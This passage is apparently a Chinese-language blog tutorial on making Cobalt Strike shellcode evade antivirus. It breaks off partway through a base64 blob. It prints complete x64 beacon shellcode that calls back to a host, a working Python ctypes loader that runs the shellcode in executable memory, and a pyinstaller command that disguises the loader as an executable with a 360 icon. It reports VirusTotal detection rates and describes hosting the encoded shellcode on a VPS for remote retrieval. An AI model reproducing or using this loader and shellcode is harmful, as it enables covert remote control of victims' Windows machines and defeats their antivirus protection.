文章目錄
- 1. shellcode Loader
- 1.1 生成shellcode
- 1.2 shellcode loader 腳本上線測驗
- 1.3 使用pyinstaller生成exe檔案上線測驗
- 1.4 VT查殺率:24/68
- 2. ShellCode 分離
- 2.1 上傳加密后的shellcode
- 2.2 改寫shellcode loader
- 2.3 shellcode 分離后shellcode loader腳本上線測驗
- 2.4 shellcode 分離后,使用pyinstaller生成exe檔案上線測驗
- 2.5 VT查殺率:14/67
- 3. ShellCode 及ShellCoder 的分離
- 3.1 改寫shellcode loader
- 3.2 shellcode和shellcode loader均分離后,兩行代碼的腳本上線測驗
- 3.3 使用pyinstaller生成exe檔案上線測驗
- 3.4 VT查殺率:10/68
1. shellcode Loader
1.1 生成shellcode
生成py型別的payload:
得到shellcode:
buf = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\xb3\x15\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x4f\x6c\x69\x39\x00\xea\xf8\x43\x38\x93\xe8\x36\x73\xce\x2f\x3b\x08\x6f\xa9\x7e\x11\xdc\x18\xf8\x71\x43\xe2\x0f\x92\xd7\x3e\xd6\xac\xfc\xab\x59\x15\xd9\xdc\x48\x2c\x76\xc9\x3c\x19\x77\xbe\x4f\x57\xbf\xe0\x17\xfb\x7b\x1f\x0f\xd5\xc3\x89\x12\x37\x8b\xe7\x37\x80\xd8\x2c\x96\x7c\xb8\x08\x0e\xf1\x37\x48\x15\x9e\xa8\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x37\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x35\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x34\x2e\x30\x29\x0d\x0a\x00\x67\x8d\x04\x19\x98\x95\x99\x3d\x2f\x9e\x37\xab\x27\x74\x98\xe8\xc9\x1e\x06\xce\x89\x67\xcd\x7d\x63\xb1\x88\x6f\xdc\xee\x0f\xf2\x32\xa0\xf4\x0e\xf6\xcf\xc5\x60\x0c\x1d\xcb\x29\xfc\xd7\xc2\xfa\xba\x59\xdf\x1a\x04\xd3\xc5\x20\xcd\xed\x18\x6e\xe9\xa1\xe8\xad\xa7\x7f\xf2\x97\xab\x8b\x54\x19\xe3\x85\x19\x80\x33\x88\xf1\x68\x54\x7a\xcb\x8b\xf1\x5e\xf9\x80\x59\xd1\x4d\x4e\x41\x0a\xcc\xe0\x3b\x5a\xb4\x50\x30\xbe\xc0\xa5\xa3\x74\xbf\x36\xbb\xc5\xee\x1c\x1a\x3c\x25\xb0\x0e\x78\xa7\xa9\x6d\x16\xce\x32\x17\x7b\x9c\x0d\x44\x5e\x3e\xc5\x7d\x7c\xba\xb0\x83\x34\x31\xcd\xcc\x11\xf8\x78\x64\x4d\xe5\x93\x0d\x7d\xce\xac\x63\x6f\x06\x42\x0d\x18\xa2\x5e\x01\xb3\x87\xcd\x1d\x8e\xd4\x0b\x19\xe8\xd7\xca\x9f\x83\xaa\xa8\x4b\x75\x45\x62\x93\x55\xf2\x2c\xb7\xe9\x2f\xd8\x78\x38\x64\x21\xbd\x5e\xeb\x11\xd3\x38\xaa\x1f\x5c\x34\xd4\x04\x8c\xec\x18\x44\x5f\x46\x40\x65\x5b\x67\xec\xd1\x39\x66\x9d\x89\x9c\x47\xde\x9e\xe9\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x38\x2e\x34\x38\x00\x19\x69\xa0\x8d"
1.2 shellcode loader 腳本上線測驗
將生成的payload復制到此加載器:
#!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time : 2021/10/24 15:32
# @Author : AA8j
# @Site :
# @File : Loader2.py
# @Software: PyCharm
# @Blog : https://blog.csdn.net/qq_44874645
import ctypes
shellcode = b"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\xb3\x15\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x4f\x6c\x69\x39\x00\xea\xf8\x43\x38\x93\xe8\x36\x73\xce\x2f\x3b\x08\x6f\xa9\x7e\x11\xdc\x18\xf8\x71\x43\xe2\x0f\x92\xd7\x3e\xd6\xac\xfc\xab\x59\x15\xd9\xdc\x48\x2c\x76\xc9\x3c\x19\x77\xbe\x4f\x57\xbf\xe0\x17\xfb\x7b\x1f\x0f\xd5\xc3\x89\x12\x37\x8b\xe7\x37\x80\xd8\x2c\x96\x7c\xb8\x08\x0e\xf1\x37\x48\x15\x9e\xa8\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x37\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x35\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x34\x2e\x30\x29\x0d\x0a\x00\x67\x8d\x04\x19\x98\x95\x99\x3d\x2f\x9e\x37\xab\x27\x74\x98\xe8\xc9\x1e\x06\xce\x89\x67\xcd\x7d\x63\xb1\x88\x6f\xdc\xee\x0f\xf2\x32\xa0\xf4\x0e\xf6\xcf\xc5\x60\x0c\x1d\xcb\x29\xfc\xd7\xc2\xfa\xba\x59\xdf\x1a\x04\xd3\xc5\x20\xcd\xed\x18\x6e\xe9\xa1\xe8\xad\xa7\x7f\xf2\x97\xab\x8b\x54\x19\xe3\x85\x19\x80\x33\x88\xf1\x68\x54\x7a\xcb\x8b\xf1\x5e\xf9\x80\x59\xd1\x4d\x4e\x41\x0a\xcc\xe0\x3b\x5a\xb4\x50\x30\xbe\xc0\xa5\xa3\x74\xbf\x36\xbb\xc5\xee\x1c\x1a\x3c\x25\xb0\x0e\x78\xa7\xa9\x6d\x16\xce\x32\x17\x7b\x9c\x0d\x44\x5e\x3e\xc5\x7d\x7c\xba\xb0\x83\x34\x31\xcd\xcc\x11\xf8\x78\x64\x4d\xe5\x93\x0d\x7d\xce\xac\x63\x6f\x06\x42\x0d\x18\xa2\x5e\x01\xb3\x87\xcd\x1d\x8e\xd4\x0b\x19\xe8\xd7\xca\x9f\x83\xaa\xa8\x4b\x75\x45\x62\x93\x55\xf2\x2c\xb7\xe9\x2f\xd8\x78\x38\x64\x21\xbd\x5e\xeb\x11\xd3\x38\xaa\x1f\x5c\x34\xd4\x04\x8c\xec\x18\x44\x5f\x46\x40\x65\x5b\x67\xec\xd1\x39\x66\x9d\x89\x9c\x47\xde\x9e\xe9\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x38\x2e\x34\x38\x00\x19\x69\xa0\x8d"
# CS生成的ShellCode
shellcode = bytearray(shellcode)
"""
【設定回傳型別】
我們需要用VirtualAlloc函式來申請記憶體,回傳型別必須和系統位數相同
想在64位系統上運行,必須使用restype函式設定VirtualAlloc回傳型別為ctypes.c_unit64,否則默認的是 32 位
"""
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
"""
【申請記憶體】
ctypes.c_int(0) :是NULL,系統將會決定分配記憶體區域的位置,并且按64KB向上取整
ctypes.c_int(len(shellcode)) :以位元組為單位分配或者保留多大區域
ctypes.c_int(0x3000) :是 MEM_COMMIT(0x1000) 和 MEM_RESERVE(0x2000)型別的合并
ctypes.c_int(0x40) :是權限為PAGE_EXECUTE_READWRITE 該區域可以執行代碼,應用程式可以讀寫該區域,
"""
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),
ctypes.c_int(0x40))
"""
【放入shellcode】
從指定記憶體地址將內容復制到我們申請的記憶體中去,shellcode位元組多大就復制多大
"""
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(
ctypes.c_uint64(ptr),
buf,
ctypes.c_int(len(shellcode))
)
"""
【創建一個執行緒從shellcode放置位置開始執行】
lpThreadAttributes :為NULL使用默認安全性
dwStackSize :為0,默認將使用與呼叫該函式的執行緒相同的堆疊空間大小
lpStartAddress :為ctypes.c_uint64(ptr),定位到申請的記憶體所在的位置
lpParameter :不需傳遞引數時為NULL
dwCreationFlags :屬性為0,表示創建后立即激活
lpThreadId :為ctypes.pointer(ctypes.c_int(0))不想回傳執行緒ID,設定值為NULL
"""
handle = ctypes.windll.kernel32.CreateThread(
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_uint64(ptr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes.c_int(0))
)
"""
【等待執行緒結束】
這里兩個引數,一個是創建的執行緒,一個是等待時間
當執行緒退出時會給出一個信號,函式收到后會結束程式,
當時間設定為0或超過等待時間,程式也會結束,所以執行緒也會跟著結束,
正常的話我們創建的執行緒是需要一直運行的,所以將時間設為負數,等待時間將成為無限等待,程式就不會結束,
"""
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
靶機使用python運行,成功上線:
1.3 使用pyinstaller生成exe檔案上線測驗
使用pyinstaller生成exe檔案:
pyinstaller -w -F Loader2.py -i 360.ico -n test.exe
pyinstaller引數說明:
-F,-onefile 產生單個的可執行檔案
-D,--onedir 產生一個目錄(包含多個檔案)作為可執行程式
-a,--ascii 不包含 Unicode 字符集支持
-d,--debug 產生 debug 版本的可執行檔案
-w,--windowed,--noconsolc 指定程式運行時不顯示命令列視窗(僅對 Windows 有效)
-c,--nowindowed,--console 指定使用命令列視窗運行程式(僅對 Windows 有效)
-o DIR,--out=DIR 指定 spec 檔案的生成目錄,如果沒有指定,則默認使用當前目錄來生成 spec 檔案
-p DIR,--path=DIR 設定 Python 匯入模塊的路徑(和設定 PYTHONPATH 環境變數的作用相似),也可使用路徑分隔符(Windows 使用分號,Linux 使用冒號)來分隔多個路徑
-n NAME,--name=NAME 指定專案(產生的 spec)名字,如果省略該選項,那么第一個腳本的主檔案名將作為 spec 的名字
雙擊測驗能否上線:
成功上線:
1.4 VT查殺率:24/68
360還是能輕松過的:
2. ShellCode 分離
2.1 上傳加密后的shellcode
將ShellCode使用Base64加密存放到vps上可供訪問:
shellcode(注意格式為b"shellcode"):
b"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\xb3\x15\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x4f\x6c\x69\x39\x00\xea\xf8\x43\x38\x93\xe8\x36\x73\xce\x2f\x3b\x08\x6f\xa9\x7e\x11\xdc\x18\xf8\x71\x43\xe2\x0f\x92\xd7\x3e\xd6\xac\xfc\xab\x59\x15\xd9\xdc\x48\x2c\x76\xc9\x3c\x19\x77\xbe\x4f\x57\xbf\xe0\x17\xfb\x7b\x1f\x0f\xd5\xc3\x89\x12\x37\x8b\xe7\x37\x80\xd8\x2c\x96\x7c\xb8\x08\x0e\xf1\x37\x48\x15\x9e\xa8\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x37\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x35\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x34\x2e\x30\x29\x0d\x0a\x00\x67\x8d\x04\x19\x98\x95\x99\x3d\x2f\x9e\x37\xab\x27\x74\x98\xe8\xc9\x1e\x06\xce\x89\x67\xcd\x7d\x63\xb1\x88\x6f\xdc\xee\x0f\xf2\x32\xa0\xf4\x0e\xf6\xcf\xc5\x60\x0c\x1d\xcb\x29\xfc\xd7\xc2\xfa\xba\x59\xdf\x1a\x04\xd3\xc5\x20\xcd\xed\x18\x6e\xe9\xa1\xe8\xad\xa7\x7f\xf2\x97\xab\x8b\x54\x19\xe3\x85\x19\x80\x33\x88\xf1\x68\x54\x7a\xcb\x8b\xf1\x5e\xf9\x80\x59\xd1\x4d\x4e\x41\x0a\xcc\xe0\x3b\x5a\xb4\x50\x30\xbe\xc0\xa5\xa3\x74\xbf\x36\xbb\xc5\xee\x1c\x1a\x3c\x25\xb0\x0e\x78\xa7\xa9\x6d\x16\xce\x32\x17\x7b\x9c\x0d\x44\x5e\x3e\xc5\x7d\x7c\xba\xb0\x83\x34\x31\xcd\xcc\x11\xf8\x78\x64\x4d\xe5\x93\x0d\x7d\xce\xac\x63\x6f\x06\x42\x0d\x18\xa2\x5e\x01\xb3\x87\xcd\x1d\x8e\xd4\x0b\x19\xe8\xd7\xca\x9f\x83\xaa\xa8\x4b\x75\x45\x62\x93\x55\xf2\x2c\xb7\xe9\x2f\xd8\x78\x38\x64\x21\xbd\x5e\xeb\x11\xd3\x38\xaa\x1f\x5c\x34\xd4\x04\x8c\xec\x18\x44\x5f\x46\x40\x65\x5b\x67\xec\xd1\x39\x66\x9d\x89\x9c\x47\xde\x9e\xe9\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x38\x2e\x34\x38\x00\x19\x69\xa0\x8d"
base64加密結果(在線加密網站:https://www.sojson.com/base64.html):
YiJceGZjXHg0OFx4ODNceGU0XHhmMFx4ZThceGM4XHgwMFx4MDBceDAwXHg0MVx4NTFceDQxXHg1MFx4NTJceDUxXHg1Nlx4NDhceDMxXHhkMlx4NjVceDQ4XHg4Ylx4NTJceDYwXHg0OFx4OGJceDUyXHgxOFx4NDhceDhiXHg1Mlx4MjBceDQ4XHg4Ylx4NzJceDUwXHg0OFx4MGZceGI3XHg0YVx4NGFceDRkXHgzMVx4YzlceDQ4XHgzMVx4YzBceGFjXHgzY1x4NjFceDdjXHgwMlx4MmNceDIwXHg0MVx4YzFceGM5XHgwZFx4NDFceDAxXHhjMVx4ZTJceGVkXHg1Mlx4NDFceDUxXHg0OFx4OGJceDUyXHgyMFx4OGJceDQyXHgzY1x4NDhceDAxXHhkMFx4NjZceDgxXHg3OFx4MThceDBiXHgwMlx4NzVceDcyXHg4Ylx4ODBceDg4XHgwMFx4MDBceDAwXHg0OFx4ODVceGMwXHg3NFx4NjdceDQ4XHgwMVx4ZDBceDUwXHg4Ylx4NDhceDE4XHg0NFx4OGJceDQwXHgyMFx4NDlceDAxXHhkMFx4ZTNceDU2XHg0OFx4ZmZceGM5XHg0MVx4OGJceDM0XHg4OFx4NDhceDAxXHhkNlx4NGRceDMxXHhjOVx4NDhceDMxXHhjMFx4YWNceDQxXHhjMVx4YzlceDBkXHg0MVx4MDFceGMxXHgzOFx4ZTBceDc1XHhmMVx4NGNceDAzXHg0Y1x4MjRceDA4XHg0NVx4MzlceGQxXHg3NVx4ZDhceDU4XHg0NFx4OGJceDQwXHgyNFx4NDlceDAxXHhkMFx4NjZceDQxXHg4Ylx4MGNceDQ4XHg0NFx4OGJceDQwXHgxY1x4NDlceDAxXHhkMFx4NDFceDhiXHgwNFx4ODhceDQ4XHgwMVx4ZDBceDQxXHg1OFx4NDFceDU4XHg1ZVx4NTlceDVhXHg0MVx4NThceDQxXHg1OVx4NDFceDVhXHg0OFx4ODNceGVjXHgyMFx4NDFceDUyXHhmZlx4ZTBceDU4XHg0MVx4NTlceDVhXHg0OFx4OGJceDEyXHhlOVx4NGZceGZmXHhmZlx4ZmZceDVkXHg2YVx4MDBceDQ5XHhiZVx4NzdceDY5XHg2ZVx4NjlceDZlXHg2NVx4NzRceDAwXHg0MVx4NTZceDQ5XHg4OVx4ZTZceDRjXHg4OVx4ZjFceDQxXHhiYVx4NGNceDc3XHgyNlx4MDdceGZmXHhkNVx4NDhceDMxXHhjOVx4NDhceDMxXHhkMlx4NGRceDMxXHhjMFx4NGRceDMxXHhjOVx4NDFceDUwXHg0MVx4NTBceDQxXHhiYVx4M2FceDU2XHg3OVx4YTdceGZmXHhkNVx4ZWJceDczXHg1YVx4NDhceDg5XHhjMVx4NDFceGI4XHhiM1x4MTVceDAwXHgwMFx4NGRceDMxXHhjOVx4NDFceDUxXHg0MVx4NTFceDZhXHgwM1x4NDFceDUxXHg0MVx4YmFceDU3XHg4OVx4OWZceGM2XHhmZlx4ZDVceGViXHg1OVx4NWJceDQ4XHg4OVx4YzFceDQ4XHgzMVx4ZDJceDQ5XHg4OVx4ZDhceDRkXHgzMVx4YzlceDUyXHg2OFx4MDBceDAyXHg0MFx4ODRceDUyXHg1Mlx4NDFceGJhXHhlYlx4NTVceDJlXHgzYlx4ZmZceGQ1XHg0OFx4ODlceGM2XHg0OFx4ODNceGMzXHg1MFx4NmFceDBhXHg1Zlx4NDhceDg5XHhmMVx4NDhceDg5XHhkYVx4NDlceGM3XHhjMFx4ZmZceGZmXHhmZlx4ZmZceDRkXHgzMVx4YzlceDUyXHg1Mlx4NDFceGJhXHgyZFx4MDZceDE4XHg3Ylx4ZmZceGQ1XHg4NVx4YzBceDBmXHg4NVx4OWRceDAxXHgwMFx4MDBceDQ4XHhmZlx4Y2ZceDBmXHg4NFx4OGNceDAxXHgwMFx4MDBceGViXHhkM1x4ZTlceGU0XHgwMVx4MDBceDAwXHhlOFx4YTJceGZmXHhmZlx4ZmZceDJmXHg0Zlx4NmNceDY5XHgzOVx4MDBceGVhXHhmOFx4NDNceDM4XHg5M1x4ZThceDM2XHg3M1x4Y2VceDJmXHgzYlx4MDhceDZmXHhhOVx4N2VceDExXHhkY1x4MThceGY4XHg3MVx4NDNceGUyXHgwZlx4OTJceGQ3XHgzZVx4ZDZceGFjXHhmY1x4YWJceDU5XHgxNVx4ZDlceGRjXHg0OFx4MmNceDc2XHhjOVx4M2NceDE5XHg3N1x4YmVceDRmXHg1N1x4YmZceGUwXHgxN1x4ZmJceDdiXHgxZlx4MGZceGQ1XHhjM1x4ODlceDEyXHgzN1x4OGJceGU3XHgzN1x4ODBceGQ4XHgyY1x4OTZceDdjXHhiOFx4MDhceDBlXHhmMVx4MzdceDQ4XHgxNVx4OWVceGE4XHgwMFx4NTVceDczXHg2NVx4NzJceDJkXHg0MVx4NjdceDY1XHg2ZVx4NzRceDNhXHgyMFx4NGRceDZmXHg3YVx4NjlceDZjXHg2Y1x4NjFceDJmXHgzNFx4MmVceDMwXHgyMFx4MjhceDYzXHg2Zlx4NmRceDcwXHg2MVx4NzRceDY5XHg2Mlx4NmNceDY1XHgzYlx4MjBceDRkXHg1M1x4NDlceDQ1XHgyMFx4MzdceDJlXHgzMFx4M2JceDIwXHg1N1x4NjlceDZlXHg2NFx4NmZceDc3XHg3M1x4MjBceDRlXHg1NFx4MjBceDM1XHgyZVx4MzFceDNiXHgyMFx4NTRceDcyXHg2OVx4NjRceDY1XHg2ZVx4NzRceDJmXHgzNFx4MmVceDMwXHgyOVx4MGRceDBhXHgwMFx4NjdceDhkXHgwNFx4MTlceDk4XHg5NVx4OTlceDNkXHgyZlx4OWVceDM3XHhhYlx4MjdceDc0XHg5OFx4ZThceGM5XHgxZVx4MDZceGNlXHg4OVx4NjdceGNkXHg3ZFx4NjNceGIxXHg4OFx4NmZceGRjXHhlZVx4MGZceGYyXHgzMlx4YTBceGY0XHgwZVx4ZjZceGNmXHhjNVx4NjBceDBjXHgxZFx4Y2JceDI5XHhmY1x4ZDdceGMyXHhmYVx4YmFceDU5XHhkZlx4MWFceDA0XHhkM1x4YzVceDIwXHhjZFx4ZWRceDE4XHg2ZVx4ZTlceGExXHhlOFx4YWRceGE3XHg3Zlx4ZjJceDk3XHhhYlx4OGJceDU0XHgxOVx4ZTNceDg1XHgxOVx4ODBceDMzXHg4OFx4ZjFceDY4XHg1NFx4N2FceGNiXHg4Ylx4ZjFceDVlXHhmOVx4ODBceDU5XHhkMVx4NGRceDRlXHg0MVx4MGFceGNjXHhlMFx4M2JceDVhXHhiNFx4NTBceDMwXHhiZVx4YzBceGE1XHhhM1x4NzRceGJmXHgzNlx4YmJceGM1XHhlZVx4MWNceDFhXHgzY1x4MjVceGIwXHgwZVx4NzhceGE3XHhhOVx4NmRceDE2XHhjZVx4MzJceDE3XHg3Ylx4OWNceDBkXHg0NFx4NWVceDNlXHhjNVx4N2RceDdjXHhiYVx4YjBceDgzXHgzNFx4MzFceGNkXHhjY1x4M